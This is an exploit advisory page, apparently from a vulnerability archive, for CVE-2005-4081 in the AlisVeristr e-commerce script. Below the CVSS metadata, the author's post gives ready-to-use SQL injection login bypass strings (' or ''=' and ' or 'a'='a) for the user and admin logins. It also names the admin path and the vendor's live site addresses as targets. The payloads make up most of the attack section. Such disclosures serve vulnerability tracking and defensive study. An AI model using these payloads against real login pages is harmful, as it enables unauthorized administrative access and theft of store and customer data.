AlisVeristr E-commerce Script Admin and User Login Sql Injection

2005.12.03

Credit: B3g0k

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2005-4081

CWE: CWE-Other

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

###Hi all
###B3g0k[at]hackermail.com
###Kurdish Hacker
###Special Thanx All Kurdish Hackers
###Freedom For Ocalan!!!
###-----------------------------------
###Alisveristr E-commerce User Login Sql Injection
###Alisveristr E-commerce Admin Login Sql ### Injection
###-----------------------------------
###Site: http://www.alisveristr.com or ###http://www.alisveris-tr.com
###
###Description: A E-Commerce scirpt it is too ###cool... :)
User login Sql Injection:
Code 1 For User Login :
Username : ' or ''='
Password: ' or ''='
Another User Login Sql &amp;#304;njecition
Username : ' or 'a'='a
Password : ' or 'a'='a
----------------------------------
Now Admin login Sql injectoin
ex: http://site.com/yonetim/default.asp
http://www.alisveristr.com/yonetim
http://www.alisveris-tr.com/yonetim
Code 1 For Admin Login
Username : ' or ''='
Password : ' or ''='
Code 2 For Admin Login :
Username : ' or 'a'='a
Password : ' or 'a'='a
Thats it.
Contact : B3g0k@hackermail.com
Kurdish Hacker

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

AlisVeristr E-commerce Script Admin and User Login Sql Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.